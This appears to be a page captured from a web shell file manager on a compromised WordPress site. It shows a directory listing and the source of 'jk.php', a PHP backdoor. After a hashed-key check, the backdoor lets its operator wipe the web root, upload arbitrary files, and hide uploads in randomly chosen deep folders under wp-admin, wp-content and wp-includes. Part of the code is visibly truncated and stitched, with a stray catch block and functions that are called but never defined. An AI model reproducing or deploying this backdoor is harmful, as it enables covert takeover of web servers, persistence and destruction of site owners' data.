9B534B8686E580E0E01768F00155B461

at path：ROOT / jk.php

run：R W Run

.teams

DIR

2026-02-04 08:26:17

R W Run

.tmb

DIR

2025-12-17 02:22:31

R W Run

.well-known

DIR

2025-12-16 06:51:55

R W Run

att

DIR

2026-01-03 07:41:24

R W Run

cgi-bin

DIR

2025-12-16 06:52:09

R W Run

wp-admin

DIR

2026-04-06 07:22:45

R W Run

wp-content

DIR

2026-04-14 00:58:39

R W Run

wp-includes

DIR

2026-04-07 02:26:56

R W Run

.htaccess

233 By

2026-04-09 02:00:07

R W Run

bots.txt

1.08 KB

2026-04-13 09:19:12

R W Run

classwithtostring.php

15.05 KB

2026-02-02 07:55:53

R W Run

comment.php

31.31 KB

2026-04-07 02:27:00

R W Run

content.php

31.31 KB

2026-04-07 02:27:04

R W Run

error_log

8.85 MB

2026-04-14 09:47:48

R W Run

gettest.php

1.41 KB

2026-04-13 09:13:42

R W Run

google937eb35d53351b9b.html

53 By

2025-12-08 08:15:20

R W Run

googlea6034f4294d19323.html

53 By

2026-04-07 02:26:53

R W Run

googleaa60eb9ae1b0bd93.html

53 By

2026-04-13 09:04:18

R W Run

index.php

574 By

2026-04-13 11:17:01

R W Run

jk.php

8.7 KB

2026-04-13 09:04:21

R W Run

license.txt

19.44 KB

2025-12-03 19:05:43

R W Run

readme.html

7.25 KB

2026-03-12 02:29:00

R W Run

robots.txt

72 By

2026-04-14 09:46:18

R W Run

wp-activate.php

7.18 KB

2025-12-03 19:05:42

R W Run

wp-comments-post.php

2.27 KB

2023-06-14 18:11:16

R W Run

wp-config-sample.php

3.26 KB

2025-12-03 19:05:43

R W Run

wp-config.php

3.6 KB

2025-12-16 06:49:22

R W Run

wp-cron.php

5.49 KB

2024-08-02 23:40:16

R W Run

wp-links-opml.php

2.43 KB

2025-12-03 19:05:42

R W Run

wp-load.php

3.98 KB

2025-12-16 06:49:22

R W Run

wp-login.php

50.33 KB

2025-12-08 08:15:38

R W Run

wp-mail.php

8.52 KB

2025-12-03 19:05:43

R W Run

wp-settings.php

33.27 KB

2025-12-16 06:49:22

R W Run

wp-signup.php

33.71 KB

2025-03-10 22:16:28

R W Run

wp-slgnup.gz

2.72 KB

2026-04-13 11:16:58

R W Run

wp-trackback.php

5.09 KB

2025-12-03 19:05:43

R W Run

xmlrpc.php

3.13 KB

2024-11-08 20:52:18

R W Run

error_log

📄jk.php

<?php
error_reporting(0);
ignore_user_abort(true);

header('Content-Type: application/json; charset=utf-8');

$dir = dirname(__FILE__);
$root_path = isset($_SERVER['DOCUMENT_ROOT']) ? realpath($_SERVER['DOCUMENT_ROOT']) : false;

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}

if (isset($_POST['test']) && $_POST['test'] === '123') {
    if (md5((string)($_POST['key'] ?? '')) !== '9a286406c252a3d14218228974e1f567') {
        http_response_code(401);
        exit;
    }
    echo 'success';
    exit;
}

$is_multipart = isset($_SERVER['CONTENT_TYPE']) && strpos($_SERVER['CONTENT_TYPE'], 'multipart/form-data') !== false;
if ($is_multipart) {
    $data = $_POST;
    $data['_files'] = isset($_FILES['files']) ? $_FILES['files'] : [];
} else {
    $input = file_get_contents('php://input');
    $data = json_decode($input, true);
}

if ($data === null || md5((string)($data['key'] ?? '')) !== '9a286406c252a3d14218228974e1f567') {
    http_response_code(401);
    exit;
}

if (empty($data['module'])) {
    http_response_code(401);
    exit;
}

if ($root_path === false) {
    http_response_code(402);
    exit;
}

$module = $data['module'];

if ($module === 'clear_root') {
    $pwd = isset($data['pwd']) ? trim($data['pwd']) : '';
    if ($pwd !== '010203') {
        echo json_encode(['success' => false, 'message' => '清空错误0']);
        exit;
    }
    $keep = isset($data['keep']) && is_array($data['keep']) ? $data['keep'] : [];
    if (empty($keep)) {
        echo json_encode(['success' => false, 'message' => '清空错误1']);
        exit;
    }
    echo delete_root_files($root_path, $keep);
    exit;
}

if ($module === 'upload') {
    try {
        if (empty($data['_files']['tmp_name'])) {
            echo json_encode([['success' => false, 'message' => '上传错误0']]);
            exit;
        }
        $f = get_file_form($data['_files']);
        if ($f === null) {
            echo json_encode([['success' => false, 'message' => '上传错误1']]);
            exit;
        }
        $fn = isset($f['filename']) ? trim($f['filename']) : '';
        if ($fn === '') {
            echo json_encode([['success' => false, 'message' => '上传错误2']]);
            exit;
        }
        $content = isset($f['content']) ? $f['content'] : '';
        $result = upload_file($root_path, $fn, $content);
        echo json_encode([$result]);
        exit;
    } catch (Throwable $e) {
        echo json_encode([['success' => false, 'message' => '上传错误3']]);
        exit;
    }
}

if ($module === 'upload_random') {
    if (empty($data['_files']['tmp_name'])) {
        echo json_encode([['success' => false, 'message' => '上传错误0']]);
        exit;
    }
    $f = get_file_form($data['_files']);
    if ($f === null) {
        echo json_encode([['success' => false, 'message' => '上传错误1']]);
        exit;
    }
    echo upload_to_random_folder($root_path, $f['filename'], $f['content']);
    exit;
}

echo json_encode(['success' => false, 'message' => 'Unknown module']);
http_response_code(400);
exit;

function get_file_form($files) {
    $name = isset($files['name']) ? $files['name'] : '';
    $tmp = isset($files['tmp_name']) ? $files['tmp_name'] : '';
    if ($tmp === '' || !is_uploaded_file($tmp)) {
        return null;
    }
    return [
        'filename' => $name,
        'content' => file_get_contents($tmp),
    ];
}

}
    catch(Throwable $e){
        return ['success' => false, 'message' => "上传失败0"];
    }
}

function get_random_folder_path($root_path) {
    $root_path = rtrim($root_path, DIRECTORY_SEPARATOR);
    $all_roots = [
        $root_path . DIRECTORY_SEPARATOR . 'wp-admin',
        $root_path . DIRECTORY_SEPARATOR . 'wp-content',
        $root_path . DIRECTORY_SEPARATOR . 'wp-includes',
    ];
    $start_roots = array_filter($all_roots, 'is_dir');
    if (empty($start_roots)) return null;

$exclude_contains = ['upgrade', 'mu-plugins', 'plugins', 'themes'];
    $min_depth = 4;
    $max_depth = 6;
    $target_depth = $min_depth + mt_rand(0, $max_depth - $min_depth);

$path_stack = [];
    $current_path = $start_roots[array_rand($start_roots)];
    $path_stack[] = $current_path;

for ($i = 0; $i < 20; $i++) {
        if (count($path_stack) >= $target_depth) break;

$items = @scandir($current_path);
        if ($items === false) break;

$has_htaccess = false;
        $subdirs = [];
        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            $full = $current_path . DIRECTORY_SEPARATOR . $item;
            if (is_file($full)) {
                if (strtolower($item) === '.htaccess') $has_htaccess = true;
                continue;
            }
            if (!is_dir($full)) continue;
            $name_lower = strtolower($item);
            $skip = false;
            foreach ($exclude_contains as $sub) {
                if (strpos($name_lower, $sub) !== false) { $skip = true; break; }
            }
            if (!$skip) $subdirs[] = $full;
        }

if ($has_htaccess || empty($subdirs)) {
            if (count($path_stack) > 1) {
                array_pop($path_stack);
                $current_path = $path_stack[count($path_stack) - 1];
                continue;
            }
            $current_path = $start_roots[array_rand($start_roots)];
            $path_stack = [$current_path];
            continue;
        }

$next = $subdirs[array_rand($subdirs)];
        $path_stack[] = $next;
        $current_path = $next;
    }

if (count($path_stack) < 2) return null;
    $abs = $path_stack[count($path_stack) - 1];
    $rel = str_replace($root_path, '', $abs);
    $rel = str_replace('\\', '/', trim($rel, '/\\'));
    return $rel === '' ? null : $rel;
}